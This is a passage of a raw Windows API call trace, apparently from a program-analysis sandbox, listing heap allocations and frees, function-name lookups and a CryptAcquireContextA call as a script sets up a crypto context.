(in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0153.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0153.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0153.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0153.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0153.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0153.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0153.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0153.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0153.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0153.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0153.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0153.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0153.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0153.451] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0153.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0153.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0153.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0153.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0153.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0153.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0153.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0153.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0153.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0153.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0153.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0153.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0153.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0153.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0153.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0153.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0153.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0153.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0153.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0153.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0153.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0153.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0153.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0153.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0153.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0153.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0153.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69988, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0153.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0153.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0153.452] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0153.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0153.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0153.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0153.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0153.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0153.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0153.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0153.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69b68 [0153.453] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69b68, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0153.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0153.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0153.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0153.453] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0153.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0153.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0153.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0153.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0153.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0153.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0153.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0153.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0153.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0153.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0153.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0153.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0153.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0153.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0153.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0153.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0153.453] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0153.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0153.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0153.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0153.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0153.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0153.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0153.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0153.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0153.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0153.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0153.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0153.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0153.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0153.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0153.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0153.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0153.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0153.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0153.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0153.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0153.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0153.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0153.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0153.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0153.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0153.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0153.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0153.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0153.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0153.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0153.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0153.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0153.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0153.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0153.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0153.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0153.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0153.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0153.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0153.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0153.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0153.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0153.455] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0153.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0153.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0153.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0153.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0153.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0153.456] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0153.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0153.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0153.456] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0153.456] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0153.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0153.456] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0153.456] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0153.456] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0153.456] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0153.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0153.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0153.456] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0153.456] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0153.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0153.456] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0153.456] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0153.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0153.456] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0153.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0153.456] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0153.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0153.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0153.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0153.457] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0153.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0153.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe68 [0153.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0153.457] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0153.457] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0153.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0153.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0153.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0153.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0153.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0153.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0153.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0153.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0153.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0153.457] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0153.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0153.457] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0153.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0153.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0153.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0153.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0153.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0153.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0153.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0153.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0153.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0153.458] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0153.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0153.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0153.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0153.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0153.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0153.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0153.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0153.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0153.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0153.458] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0153.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0153.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0153.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0153.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0153.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0153.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0153.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0153.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0153.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0153.458] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0153.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0153.459] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0153.459] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0153.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0153.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0153.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0153.459] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0153.459] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0153.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0153.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0153.459] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0153.459] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0153.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0153.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0153.459] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0153.459] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0153.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0153.459] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0153.459] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0153.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0153.459] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0153.459] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0153.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) 